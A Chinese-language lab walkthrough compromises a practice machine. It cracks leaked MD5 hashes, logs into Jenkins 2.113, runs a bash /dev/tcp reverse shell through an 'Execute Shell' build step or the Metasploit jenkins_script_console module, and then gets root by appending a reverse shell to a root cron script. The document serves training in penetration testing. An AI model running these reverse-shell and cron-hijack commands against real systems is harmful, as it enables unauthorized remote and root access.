nmap扫描存活主机和端口,发现开放了22、80、3306、8080端口
访问80端口如下,但是没什么有用的信息
访问8080端口如下,可知是Jenkins的登录面板,其版本为2.113
接着扫目录不过并没有发现什么有用的信息,搜索一下相关漏洞都无法利用,后面看了下wp发现dirb带个-X啥的参数再来扫一下发现access.html
# dirb http://192.168.150.149 -w /usr/share/wordlists/dirb/big.txt -X .txt,.html
---- Scanning URL: http://192.168.150.149/ ----
+ http://192.168.150.149/access.html (CODE:200|SIZE:359)
+ http://192.168.150.149/index.html (CODE:200|SIZE:32808)
-----------------
访问得到三个hash加密的用户密码
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
cmd5解密得到账密如下:
tiago/italia99
trindade/marianna
eder/vipsu
尝试登录发现eder/vipsu
可以成功登录Jenkins,然后ssh和mysql都无法登录
点击Manage Jenkins -> Configure System
有个Shell executable
的设置,可以执行一些 shell 命令
于是我们点击New Item
,随便输入一个主题名字并选择Freestyle project
接着往下滑点击Add build step -> Execute Shell
,输入反弹shell命令
/bin/bash -i >& /dev/tcp/192.168.150.128/1234 0>&1
build后nc成功反弹shell
也可以利用msf上线
use exploit/multi/http/jenkins_script_console
set target 1
set rhosts 192.168.150.149
set rport 8080
set username eder
set password vipsu
set targeturi /
python -c 'import pty; pty.spawn("/bin/bash")'
然后查看计划任务发现了个CleaningScript.sh
的脚本,它会以 root 权限运行,从系统中删除访问日志,每5分钟会自动执行一次
cat /etc/crontab
cd /etc/script
cat CleaningScript.sh
于是我们对其写入反弹shell命令
echo "/bin/bash -i >& /dev/tcp/192.168.150.128/4321 0>&1" >> /etc/script/CleaningScript.sh
等待几分钟nc成功反弹shell
最后一次更新于2023-01-20
0 条评论